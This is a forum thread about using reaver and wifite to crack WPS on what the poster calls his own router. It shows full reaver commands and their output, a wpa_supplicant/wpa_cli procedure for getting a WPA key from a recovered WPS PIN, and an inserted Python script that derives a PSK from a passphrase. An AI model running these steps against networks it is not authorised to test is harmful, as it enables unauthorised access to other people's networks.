I see the topic is moved. Hopefully someone will respond now.
Thanks
I am running these tools against my home network.
I am running first wifite.py (http://www.backtrack-linux.org/forum...ad.php?t=48161) and then reaver.
I know wifite.py is very capable of cracking WPS-enabled APs. However, this time it cracked the correct WPS PIN but not the passphrase. Hence I ran reaver to crack the passphrase. I ran it 4 times and got 4 different passphrases, none of which is correct. Please see the detailed output below.
Would be keen to know the reason for this please.
Regards
Code:
root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux
root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching mon0 to channel 11
[+] Waiting for beacon from D0:7D:33:6E:A7:B7
[+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 11 seconds
[+] WPS PIN: '18794786'
[+] WPA PSK: 'aa0a90d4868af15113e51e818e437a6726f75efc7c38d1c9947f26377324f389'
[+] AP SSID: 'Security'
[+] Nothing done, nothing to save.
root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching mon0 to channel 11
[+] Waiting for beacon from D0:7D:33:6E:A7:B7
[+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 26 seconds
[+] WPS PIN: '18794786'
[+] WPA PSK: '3b3c94285738ab32c88274bebbc7fc9641c2ed123ada4e55dca897ca57ce8e05'
[+] AP SSID: 'Security'
You have new mail in /var/mail/root
root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching mon0 to channel 11
[+] Waiting for beacon from D0:7D:33:6E:A7:B7
[+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 30 seconds
[+] WPS PIN: '18794786'
[+] WPA PSK: '6437b12e41d82c03f53f23993b79a03b728dbc4dffae116ade802cb3a941e6ec'
[+] AP SSID: 'Security'
You have new mail in /var/mail/root
root@bt:~# reaver -i mon0 -b D0:7D:33:6E:A7:B7 -p 18794786 -c 11 -vv
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching mon0 to channel 11
[+] Waiting for beacon from D0:7D:33:6E:A7:B7
[+] Associated with D0:7D:33:6E:A7:B7 (ESSID: Security)
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 18794786
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 13 seconds
[+] WPS PIN: '18794786'
[+] WPA PSK: '9402de2456f497009bd2725123dd97c05b9a947373187893eb41790024185283'
[+] AP SSID: 'Security'
[+] Nothing done, nothing to save.
root@bt:~#
Hi ya all.. I am hoping at least someone can point me to some other resources where I can possibly find the answer to my query..
regards
OK, I think it is better you follow this http://code.google.com/p/wifite/ and this https://github.com/derv82/wifite; with this tutorial, confirm you can understand how wifite + reaver work together......
Good Luck
ok reviving this old post of mine..
I have now installed Reaver v1.3 and am still trying to crack my AP.. it's getting the correct PIN but not the passphrase.
Quite curious here..
Code:
root@bt:~# reaver -i mon0 -b F0:7D:68:6E:A7:E8 -e Security -c 11 -p 18794786
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from F0:7D:68:6E:A7:E8
[+] Associated with F0:7D:68:6E:A7:E8 (ESSID: Security)
[+] WPS PIN: '18794786'
[+] WPA PSK: '238ae6076460e99efbf7a5e3940db4fbe7f35cf61a7972444f04bfd3847941e7'
[+] AP SSID: 'Security'
root@bt:~# reaver -i mon0 -b F0:7D:68:6E:A7:E8 -e Security -c 11 -p 18794786
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from F0:7D:68:6E:A7:E8
[+] Associated with F0:7D:68:6E:A7:E8 (ESSID: Security)
[+] WPS PIN: '18794786'
[+] WPA PSK: '395038100f4cf0940101bd7ec69adab509af5f189af1931db576d9198160819c'
[+] AP SSID: 'Security'
Have looked over here:
http://code.google.com/p/reaver-wps/issues/list
But nothing really pointing me in the right direction. I just had a feeling that Reaver v1.3 is a bit better than Reaver v1.4; however, I am still getting the same error.
Any pointers? It's really a reaver issue and not a wifite.py issue.
If the PIN is correct, you can use wpa_supplicant and wpa_cli to authenticate to the router, and then read the PSK either from the router config page or wpa_supplicant.conf. There is info on how to do this in the Reaver googlecode issues section. Reaver often gives me the PIN but not the PSK, and I can confirm this method works.
First of all, thanks a lot to VulpiArgenti. Let me first warn the readers that this is going to be a long message.
I am still not able to successfully retrieve the passphrase though I know this method works as I have tested it with other routers.
Explaining method: All credit goes to this poster:
http://code.google.com/p/reaver-wps/.../detail?id=203
________
First, set yourself up a very basic wpa_supplicant.conf in /etc/wpa_supplicant.conf:
--
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1
--
Second, start wpa_supplicant in daemon mode:
wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf -B
Third, run wpa_cli, and verify that it's working by issuing command 'status'.
You should see wpa_state=INACTIVE
Fourth, let's add our BSSID and PIN:
wps_reg <bssid> <wps pin>
wps_reg aa:bb:cc:dd:ee:ff 18794786
You should see an "OK". Wait a few more seconds as wpa_supplicant picks up the BSSID
and tries to associate and perform key negotiation. What you want to see is
"CTRL-EVENT-CONNECTED", which will indicate that the PIN was accepted and that you're
now associated.
At this point, if you were to exit wpa_cli, you could run dhclient on wlan0
and would be offered an IP from the AP, assuming DHCPd were enabled.
Go ahead and type the command 'save' at wpa_cli terminal, which should output another "OK".
This will update the wpa_supplicant.conf file, as specified from the command line,
with a static configuration for this new network.
Verify by: cat /etc/wpa_supplicant.conf
If all went well, you should have a line under this new network titled 'psk'.
That is the ssid passphrase
___________
Now here is my output of the events:
I have created the wpa_supplicant.conf and then started wpa_supplicant in daemon mode in one terminal.
Then I opened another terminal and started wpa_cli.
Please see the output of these two terminals:
Code:
root@bt:/etc# wpa_cli
wpa_cli v0.6.9
Copyright (c) 2004-2009, Jouni Malinen <j@w1.fi> and contributors
This program is free software. You can distribute it and/or modify it under the terms of the GNU General Public License version 2.
Alternatively, this software may be distributed under the terms of the BSD license. See README and COPYING for more details.
Selected interface 'wlan0'
Interactive mode
> status
wpa_state=INACTIVE
> wps_reg aa:bb:cc:dd:ee:ff 18794786
OK
> <2>CTRL-EVENT-SCAN-RESULTS
<2>WPS-AP-AVAILABLE
<2>Trying to associate with aa:bb:cc:dd:ee:ff (SSID='Security' freq=2462 MHz)
<2>CTRL-EVENT-SCAN-RESULTS
<2>WPS-AP-AVAILABLE
<2>Associated with aa:bb:cc:dd:ee:ff
<2>CTRL-EVENT-EAP-STARTED EAP authentication started
<2>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
<2>CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
<2>CTRL-EVENT-SCAN-RESULTS
<2>WPS-AP-AVAILABLE-PIN
root@bt:/etc#
and corresponding wpa_supplicant daemon output:
Code:
root@bt:/etc# wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf –B
WPS-AP-AVAILABLE
WPS-AP-AVAILABLE
WPS-AP-AVAILABLE
Trying to associate with aa:bb:cc:dd:ee:ff (SSID='Security' freq=2462 MHz)
WPS-AP-AVAILABLE
Associated with aa:bb:cc:dd:ee:ff
WPA: No wpa_ie set - cannot generate msg 2/4
CTRL-EVENT-EAP-STARTED EAP authentication started
CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
WPA: No wpa_ie set - cannot generate msg 2/4
WPA: No wpa_ie set - cannot generate msg 2/4
WPA: No wpa_ie set - cannot generate msg 2/4
WPA: No wpa_ie set - cannot generate msg 2/4
WPA: No wpa_ie set - cannot generate msg 2/4
WPA: No wpa_ie set - cannot generate msg 2/4
So somehow it's not working for me..
One time it did work and I saved the wpa_supplicant.conf file, but the passphrase was garbage again.
Code:
root@bt:/etc# cat wpa_supplicant.conf
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1
network={
    ssid="Security"
    bssid=aa:bb:cc:dd:ee:ff
    psk=692c966e5ff1eff5e16c698036d87d5bbe94cdb73d7f14b64eac6331be561019
    proto=RSN
    key_mgmt=WPA-PSK
    pairwise=CCMP
    auth_alg=OPEN
Driving me nuts at the moment.
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
This suggests the PIN is wrong, or the AP is locked, or wpa_cli is not configured correctly (for your router).
You could look at further commands to wpa_cli, e.g. increase the debugging level, force reassociation (see man), and also run wpa_supplicant with the debug flag (-dd). Could also attempt to reconfigure the router with wpa_supplicant?? That's the limit of my knowledge, I'm afraid.
Just to clarify, there seems to be some confusion between the passphrase and the pre-shared key (PSK) here.
The passphrase is what you configure on your router/AP. Similar to a password, and (relatively) easy to remember. Your router/AP does not use this for encryption. The actual key (PSK) is calculated by applying a key-derivation function which is salted with the router's SSID.
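The passphrase/PSK distinction above explains what the 64-hex-character "WPA PSK" strings from reaver and the psk= line in the saved wpa_supplicant.conf actually are. The script below is an added example, not code from this thread or from reaver or wpa_supplicant: it derives the PSK from a passphrase and SSID the way WPA/WPA2-Personal does (PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes, SSID as salt) and reads a wpa_supplicant.conf network block to tell a quoted passphrase apart from a bare hex PSK. The SAMPLE_CONF text is constructed for the example; its passphrase/SSID pair is the published IEEE 802.11 test vector ("password" / "IEEE"), so the hex line in the second block is the genuine derived key of the first.

```python
from __future__ import annotations

import hashlib
import re

# Constructed sample of a wpa_supplicant.conf as wpa_cli's 'save' writes it.
# Block 1 stores a quoted passphrase; block 2 stores the raw 64-hex PSK, the
# same form reaver prints after "WPA PSK:". Both describe the same network.
SAMPLE_CONF = """
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1

network={
    ssid="IEEE"
    psk="password"
    key_mgmt=WPA-PSK
}

network={
    ssid="IEEE"
    psk=f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e
    proto=RSN
    key_mgmt=WPA-PSK
    pairwise=CCMP
}
"""

HEX_PSK_RE = re.compile(r"^[0-9a-fA-F]{64}$")


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32 bytes).

    The SSID is the salt, so one passphrase on two differently named networks
    gives two different keys; the hex PSK alone cannot be turned back into
    the passphrase.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32
    )


def parse_network_blocks(conf_text: str) -> list[dict[str, str]]:
    """Collect key=value pairs from every network={ ... } block in the conf."""
    blocks: list[dict[str, str]] = []
    for body in re.findall(r"network=\{(.*?)\}", conf_text, re.S):
        entry: dict[str, str] = {}
        for line in body.splitlines():
            line = line.strip()
            if "=" in line and not line.startswith("#"):
                key, _, value = line.partition("=")
                entry[key.strip()] = value.strip()
        blocks.append(entry)
    return blocks


def resolve_psk(block: dict[str, str]) -> tuple[str, bytes]:
    """Return (kind, 32-byte PSK) for one network block.

    A quoted psk= holds a passphrase and must be derived with the block's
    ssid; a bare 64-hex psk= is already the key and is used as-is.
    """
    ssid = block["ssid"].strip('"')
    raw = block["psk"]
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return "passphrase", derive_psk(raw[1:-1], ssid)
    if HEX_PSK_RE.match(raw):
        return "raw-psk", bytes.fromhex(raw)
    raise ValueError(f"unrecognised psk value: {raw!r}")


def psks_match(conf_text: str = SAMPLE_CONF) -> bool:
    """True when every network block resolves to the same 32-byte PSK, i.e.
    the hex line really is the derived form of the quoted passphrase."""
    keys = {resolve_psk(block)[1] for block in parse_network_blocks(conf_text)}
    return len(keys) == 1


if __name__ == "__main__":
    for block in parse_network_blocks(SAMPLE_CONF):
        kind, psk = resolve_psk(block)
        print(f"{block['ssid']:>6}  {kind:<10}  {psk.hex()}")
    print("all blocks agree:", psks_match())
```

A 64-hex value like the ones in the reaver output is therefore the key itself, not a passphrase that happens to look odd; it can be written straight into a network block as `psk=<hex>` (no quotes), which is exactly what wpa_cli's `save` did in the conf shown earlier in the thread. Whether a given hex key is the right one for an AP is settled by whether the 4-way handshake completes with it, which this script cannot tell you offline.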
VulpiArgenti's post above sounds about right. I was messing about with my own network settings yesterday, configuring network settings without using either network manager or WICD. I ran into the same issue with the disconnect event a number of times. It seems that there are a few different ways of configuring the wpa_supplicant.conf file, and that the network can be a bit fussy about that.